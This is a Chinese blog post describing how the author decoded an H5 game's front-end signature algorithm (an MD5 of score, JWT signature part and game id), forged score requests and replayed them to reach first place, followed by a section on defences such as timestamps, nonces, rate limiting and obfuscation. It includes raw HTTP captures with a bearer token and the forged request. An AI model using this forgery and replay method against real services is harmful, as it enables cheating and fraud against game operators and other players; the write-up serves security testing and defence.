解讀前端js中簽名演算法偽造H5游戲加分

     資訊安全在我們日常開發中息息相關，稍有忽視則容易產生安全事故，對安全測驗也提出更高要求，以下是筆者親自實踐程序：

一. 打開某個數錢游戲HTML5頁面，在瀏覽器 F12 開發工具中，查看的js，如下，都壓碩訓淆：

如上分析是Vue.js開發的前端，Webpack打包

二. 玩游戲，通過fiddler抓包，分析分數相關請求

HTTP RAW詳細報文如下：

POST https://testgame.xxxx.cn/api/services/app/Game/AddGameScore HTTP/1.1

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1laWRlbnRpZmllciI6IjI2MCIsImh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd3MvMjAwOC8wNi9pZGVudGl0eS9jbGFpbXMvdXNlcmRhdGEiOiJ7XCJVc2VyTmFtZVwiOlwiMTc4NDQ1NDk2MTdcIixcIkhlYWRJbWd1cmxcIjpudWxsLFwiTmlja05hbWVcIjpcIjE3ODQ0NTQ5NjE3XCIsXCJT2XhcIjowfSIsInN1YiI6IjI2MCIsImp0aSI6IjE4MzNiYTUzLWJiYjQtNGE4Yi1hNDFmLWEzNjQ2MjU1YThiMSIsImlhdCI6MTU4MTY0NzYzMywibmJmIjoxNTgxNjQ3NjMzLCJleHAiOjE1ODE3MzQwMzMsImlzcyI6IlZQSG9ybm9yIiwiYXVkIjoiVlBIb3Jub3IifQ.rArdySnm5mCiYrm_QanbGZE50Aw6PQINOvCZl7FQ3KA

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept: */*

Accept-Language: zh-CN

Content-Type: application/json

Content-Length: 87

Expect: 100-continue

Connection: Keep-Alive

{"id":1626,"gamescore":60,"s":"c0cb28260b42bc14808689782151e112","invitationCode":""}

HTTP/1.1 200 OK

Server: openresty/1.13.6.2

Date: Fri, 14 Feb 2020 03:54:48 GMT

Content-Type: application/json; charset=utf-8

Connection: keep-alive

Access-Control-Allow-Origin: *

X-Content-Type-Options: nosniff

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Content-Length: 206

{"result":{"isWin":true,"score":5,"currentScore":43,"bestScore":43,"bestRank":3,"dayLotteryCount":98,"winningId":0},"targetUrl":null,"success":true,"error":null,"unAuthorizedRequest":false,"__abp":true}

三. 從抓包結果字面AddGameScore 意思，分析是增加游戲分數用關鍵字AddGameScore，在加載js檔案中搜索, js可以先美化

http://xxxx.cn/js/chunk-2c4ee547.c5d8aab9.js

在檔案chunk-2c4ee547.c5d8aab9.js中 搜索AddGameScore，第一處

第二處

Webpack可以混淆前端js代碼，但不可能混淆后端介面地址，

從以上2處搜索，AddGameScore是后臺介面， 我們看到 scoreUrl 標識，再次搜索scoreUrl，

對做過前端vue開發同學，看到代碼如上這是一個發請求的地方，引數也看到分別是4個，第二個gamescore分數，第三個引數s不明白，但看Value是三元運算式， 看值n是 accessToken, 計算方式是Md5的哈希，演算法是：

t分數+"|"+accessToken的按.拆分第2個元素+"|"+windows.pubParams.id

我們去控制臺 執行下 windows.pubParams.id 得到 1626

從之前抓包請求中，分析access token 是訪問token，accessToken的按.拆分第2個元素，如下加粗

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1laWRlbnRpZmllciI6IjI2MCIsImh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd3MvMjAwOC8wNi9pZGVudGl0eS9jbGFpbXMvdXNlcmRhdGEiOiJ7XCJVc2VyTmFtZVwiOlwiMTc4NDQ1NDk2MTdcIixcIkhlYWRJbWd1cmxcIjpudWxsLFwiTmlja05hbWVcIjpcIjE3ODQ0NTQ5NjE3XCIsXCJT2XhcIjowfSIsInN1YiI6IjI2MCIsImp0aSI6IjE4MzNiYTUzLWJiYjQtNGE4Yi1hNDFmLWEzNjQ2MjU1YThiMSIsImlhdCI6MTU4MTY0NzYzMywibmJmIjoxNTgxNjQ3NjMzLCJleHAiOjE1ODE3MzQwMzMsImlzcyI6IlZQSG9ybm9yIiwiYXVkIjoiVlBIb3Jub3IifQ.rArdySnm5mCiYrm_QanbGZE50Aw6PQINOvCZl7FQ3KA

四. 偽造HTTP的加分請求

請求引數s的值是

2000|rArdySnm5mCiYrm_QanbGZE50Aw6PQINOvCZl7FQ3KA|1626

在網站加密https://md5jiami.51240.com/

s的值是c0cd28260b42bc14808689782151e112, 最后我們成功 加分2000，如下 HTTP RAW

POST https://xxxx.cn/api/services/app/Game/AddGameScore HTTP/1.1
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1laWRlbnRpZmllciI6IjI2MCIsImh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd3MvMjAwOC8wNi9pZGVudGl0eS9jbGFpbXMvdXNlcmRhdGEiOiJ7XCJVc2VyTmFtZVwiOlwiMTc4NDQ1NDk2MTdcIixcIkhlYWRJbWd1cmxcIjpudWxsLFwiTmlja05hbWVcIjpcIjE3ODQ0NTQ5NjE3XCIsXCJTZXhcIjowfSIsInN1YiI6IjI2MCIsImp0aSI6IjE4MzNiYTUzLWJiYjQtNGE4Yi1hNDFmLWEzNjQ2MjU1YThiMSIsImlhd4I6MTU4MTY0NzYzMywibmJmIjoxNTgxNjQ3NjMzLCJleHAiOjE1ODE3MzQwMzMsImlzcyI6IlZQSG9ybm9yIiwiYXVkIjoiVlBIb3Jub3IifQ.rArdySnm5mCiYrm_QanbGZE50Aw6PQINOvCZl7FQ3KA
Accept: */*
Accept-Language: zh-CN
Accept-Encoding: GZIP
Content-Type: application/json
Expect: 100-continue
Connection: Keep-Alive

{"id":1626,"gamescore":2000,"s":"c0cd28260b42bc14808689782151e112","invitationCode":""}

HTTP/1.1 200 OK

Server: openresty/1.13.6.2
Date: Fri, 14 Feb 2020 02:51:04 GMT
Content-Type: application/json; charset=utf-8
Connection: keep-alive
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

{"result":{"isWin":true,"score":5,"currentScore":2000,"bestScore":2000,"bestRank":1,"dayLotteryCount":99,"winningId":0},"targetUrl":null,"success":true,"error":null,"unAuthorizedRequest":false,"__abp":true}

我們看到HTTP Response 的JSON回傳 currentScore:2000, 我們成功為這個游戲增加了2000分

重放攻擊(Replay Attacks)又稱重播攻擊、回放攻擊，是指攻擊者發送一個目的主機已接收過的包，來達到欺騙系統的目的，主要用于身份認證程序，破壞認證的正確性，重放攻擊可以由發起者，也可以由攔截并重發該資料的敵方進行，攻擊者利用網路監聽或者其他方式盜取認證憑據，之后再把它重新發給認證服務器，重放攻擊在任何網路通程序中都可能發生，是計算機世界黑客常用的攻擊方式之一，

并可以重復請求HTTP，replay的攻擊，如下圖來自fiddler工具

以約20個HTTPS請求是成功

最近在游戲排行版，上版第一名，被成功刷分2000分

解決方案：

1. 防止Replay攻擊，前后端簽名邏輯加入時間戳timestamp, 驗簽核對時間范圍內timestamp，需要前端配合修改，

增加攻擊難度， 如微信的https://pay.weixin.qq.com/wiki/doc/api/jsapi.php?chapter=4_3

時間戳

“時戳”──代表當前時刻的數

基本思想──A接收一個訊息當且僅當其包含一個對A而言足夠接近當前時刻的時戳

原理──重放的時戳將相對遠離當前時刻

時鐘要求──通信各方的計算機時鐘保持同步

處理方式──設定大小適當的時間窗（間隔），越大越能包容網路傳輸延時，越小越能防重放攻擊

適用性──用于非連接性的對話（在連接情形下雙方時鐘若偶然出現不同步，則正確的資訊可能會被誤判為重放資訊而丟棄，而錯誤的重放資訊可能會當作最新資訊而接收）

還有兩種方法Replay攻擊

序號

通信雙方通過訊息中的序列號來判斷訊息的新鮮性

要求通信雙方必須事先協商一個初始序列號，并協商遞增方法

提問與應答

“現時”──與當前事件有關的一次性亂數N（互不重復即可）

基本做法──期望從B獲得訊息的A 事先發給B一個現時N，并要求B應答的訊息中包含N或f(N)，f是A、B預先約定的簡單函式

原理──A通過B回復的N或f(N)與自己發出是否一致來判定本次訊息是不是重放的

時鐘要求──無

適用性──用于連接性的對話

2. 服務端業務邏輯規則限制來防范，向上就是整個平臺風控管理

3. HTTP介面限流，禁止單個用戶/ip頻繁請求同對介面

4. 單個用戶頻繁請求，使用行為驗證碼驗證一起提交

5. 前端UglifyJS2提高混淆，使用屬性混淆，詳細參考

https://github.com/mishoo/UglifyJS2#cli-mangling-property-names---mangle-props

效果如下

總結

對于做過軟體開發的工程師，瀏覽器分析前端代碼與抓取HTTP請求分析服務端請求，來偽造請求 加分已不是難事，前端，服務端安全防范，Web安全測驗 任重道遠，

如有想了解更多軟體設計與架構, 系統IT,企業資訊化, 團隊管理 資訊，請關注我的微信訂閱號：

作者：Petter Liu
出處：http://www.cnblogs.com/wintersun/
本文著作權歸作者和博客園共有，歡迎轉載，但未經作者同意必須保留此段宣告，且在文章頁面明顯位置給出原文連接，否則保留追究法律責任的權利， 該文章也同時發布在我的獨立博客中-Petter Liu Blog，

標籤：訊息安全

上一篇：構建ROP鏈實作遠程堆疊溢位

下一篇：[紅日安全]Web安全Day1 - SQL注入實戰攻防